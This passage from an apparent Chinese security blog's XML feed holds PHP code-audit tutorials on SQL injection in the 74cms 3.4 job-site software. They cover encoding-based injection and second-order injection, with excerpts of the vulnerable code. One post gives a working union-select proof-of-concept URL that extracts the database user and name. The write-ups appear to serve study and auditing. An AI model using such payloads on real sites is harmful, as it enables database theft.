class=&quot;variable&quot;&gt;$htm&lt;/span&gt; .= &lt;span class=&quot;string&quot;&gt;&quot;&amp;lt;li&amp;gt;&amp;lt;a href=\&quot;&amp;#123;$url&amp;#125;\&quot; title=\&quot;&amp;#123;$row[&#39;c_note&#39;]&amp;#125;\&quot; class=\&quot;vtip\&quot;&amp;gt;&amp;#123;$row[&#39;c_name&#39;]&amp;#125;&amp;lt;/a&amp;gt;&amp;lt;span&amp;gt;&amp;#123;$row[&#39;stat_jobs&#39;]&amp;#125;&amp;lt;/span&amp;gt;&amp;lt;/li&amp;gt;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &amp;#125;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$htm&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$htm&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;&amp;lt;span class=\&quot;noinfo\&quot;&amp;gt;没有找到关键字： &amp;lt;span&amp;gt;&amp;#123;$key&amp;#125;&amp;lt;/span&amp;gt; 相关道路！&amp;lt;/span&amp;gt;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$htm&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;这里分析发现页面将查询结果回显出来，构造一些union的查询语句即可获取数据库的敏感信息。&lt;/p&gt;
&lt;h2 id=&quot;0x04_漏洞证明&quot;&gt;0x04 漏洞证明&lt;/h2&gt;&lt;p&gt;我们使用注入二（有回显）的来做证明&lt;br&gt;发现74cms的category表有9个字段，所以构造获取数据库用户和相关信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://localhost/&lt;span class=&quot;number&quot;&gt;74&lt;/span&gt;cms(&lt;span class=&quot;number&quot;&gt;20140310&lt;/span&gt;)/plus/ajax_street.php?act=key&amp;amp;key=&lt;span class=&quot;decorator&quot;&gt;%E9&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%8C&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%A6&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%27&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%20union&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%20select&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%201&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;3&lt;/span&gt;,user(),&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;6&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;7&lt;/span&gt;,database(),&lt;span class=&quot;number&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;decorator&quot;&gt;%23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql4_01.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;查看sql语句发现查询语句里反斜杠被转移，单引号成功逃逸出来：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql4_02.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;最后，有兴趣的同学可以继续获取其它的管理员账户等相关字段的信息。&lt;/p&gt;
&lt;p&gt;附GBK的汉字编码范围：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;汉字区包括：&lt;/strong&gt;&lt;br&gt;a. GB 2312 汉字区。即 GBK/2: B0A1-F7FE。收录 GB 2312 汉字 6763 个，按原顺序排列。&lt;br&gt;b. GB 13000.1 扩充汉字区。包括：&lt;br&gt;(1) GBK/3: 8140-A0FE。收录 GB 13000.1 中的 CJK 汉字 6080 个。&lt;br&gt;(2) GBK/4: AA40-FEA0。收录 CJK 汉字和增补的汉字 8160 个。CJK 汉字在前，按 UCS 代码大小排列；增补的汉字（包括部首和构件）在后，按《康熙字典》的页码/字位排列。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;可以看到，GBK编码中的两个字符是一个汉字，第一个字符需要大于128。&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/02/28/sql4/&quot;&gt;http://www.cnbraid.com/2016/02/28/sql4/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：&lt;br&gt;1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；&lt;br&gt;2.但如果存在宽字节注入，我们输入%df%27时首先经过上面提到的单引号转义变成了%df%5c%27（%5c是反斜杠\），之后在数据库查询前由于使用了GBK多字节编码，即在汉字编码范围内两个字节会被编码为一个汉字。然后MySQL服务器会对查询语句进行GBK编码即%df%5c转换成了汉字“運”（注：GBK的汉字编码范围见附录），而单引号逃逸了出来，从而造成了注入漏洞。&lt;br&gt;现在基本上都会将mysql的连接配置为“set character_set_client=binary”来解决这个问题，所以这篇文章将介绍出现在php中因为字符编码转换导致的注入问题。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-063219&quot; target=&quot;_blank&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-063219&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass3.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入</title>
    <link href="http://www.cnbraid.com/2016/02/19/sql3/"/>
    <id>http://www.cnbraid.com/2016/02/19/sql3/</id>
    <published>2016-02-19T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:34.076Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。二次注入也是一种比较常见的注入，它涉及到入库和出库。因为有全局转义所以入库的时候：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Insert into table (username) values (‘hack\’’);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;这样入库后转义符就会消失变成了hack’，这样如果hack’出库被带入查询的话就会成功的引入了单引号导致注入。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-068362&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-068362&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass2.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;看背景我们使用了低版本的74cms程序，版本为3.4（20140310）&lt;br&gt;①源码网上可以搜到，我打包了一份：&lt;a href=&quot;http://pan.baidu.com/s/1c1mLCru&quot; title=&quot;74cmsV3.4(20140310).zip&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pan.baidu.com/s/1c1mLCru&lt;/a&gt;&lt;br&gt;②解压到www的74cms(20140310)目录下，浏览器访问&lt;a href=&quot;http://localhost/74cms(20140310&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/74cms(20140310)&lt;/a&gt;)，然后按照提示一步步安装即可，安装遇到问题请自行百度或谷歌，成功后访问如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_02.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Part1:源码结构&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;源码的结构比较清晰，应该是审计过最清晰的结构了，主要有下面三块内容：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql3_03.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;index.php引入了common.inc.php文件，我们跟进common.inc.php，发现了处理gpc的函数:&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;  = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt; = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;   = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;  = addslashes_deep(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;可以看到，服务端处理GET和POST请求的变量时都会做addslashes处理。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Part2:审计过程&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;1.首先在个人发布简历处：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;elseif&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$act&lt;/span&gt; == &lt;span class=&quot;string&quot;&gt;&#39;make4_save&#39;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt; = get_resume_education(&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;], &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;pid&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (count(&lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt;) &amp;gt;= &lt;span class=&quot;number&quot;&gt;6&lt;/span&gt;) showmsg(&lt;span class=&quot;string&quot;&gt;&#39;教育经历不能超过6条！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;] = intval(&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;pid&#39;&lt;/span&gt;] = intval(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;pid&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;] == &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt; || &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;pid&#39;&lt;/span&gt;] == &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;) showmsg(&lt;span class=&quot;string&quot;&gt;&#39;参数错误！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;start&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;start&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;start&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请填写开始时间！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;endtime&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;endtime&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;endtime&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请填写结束时间！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;school&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;school&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;school&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请填写学校名称！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;speciality&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;speciality&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;speciality&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请填写专业名称！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请选择获得学历！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education_cn&#39;&lt;/span&gt;] = trim(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education_cn&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;education_cn&#39;&lt;/span&gt;] : showmsg(&lt;span class=&quot;string&quot;&gt;&#39;请选择获得学历！&#39;&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$link&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//看到这里有个插入表“qs_resume_education”的操作，将教育背景相关的字段入库&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (inserttable(table(&lt;span class=&quot;string&quot;&gt;&#39;resume_education&#39;&lt;/span&gt;), &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        check_resume(&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;], intval(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;pid&#39;&lt;/span&gt;]));&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;2.这里看到insert入库了，可以尝试加个单引号，入库后就会消除转义字符。我们先继续跟进inserttables后的check_resume函数&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//检查简历的完成程度&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;check_resume&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;global&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$db&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$timestamp&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_CFG&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt; = intval(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt; = intval(&lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt; = get_resume_basic(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$resume_intention&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;intention_jobs&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$resume_specialty&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;specialty&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//获取教育经历，出数据库了&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt; = get_resume_education(&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$pid&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;15&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_intention&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;15&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_specialty&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;15&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;empty&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$resume_education&lt;/span&gt;)) &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; + &lt;span class=&quot;number&quot;&gt;15&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo_img&#39;&lt;/span&gt;] &amp;amp;&amp;amp; &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo_audit&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&quot;1&quot;&lt;/span&gt; &amp;amp;&amp;amp; &lt;span class=&quot;variable&quot;&gt;$resume_basic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo_display&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&quot;1&quot;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo&#39;&lt;/span&gt;] = &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;photo&#39;&lt;/span&gt;] = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$percent&lt;/span&gt; &amp;lt; &lt;span class=&quot;number&quot;&gt;60&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$setsqlarr&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;complete_percent&#39;&lt;/span&gt;] = &lt;span 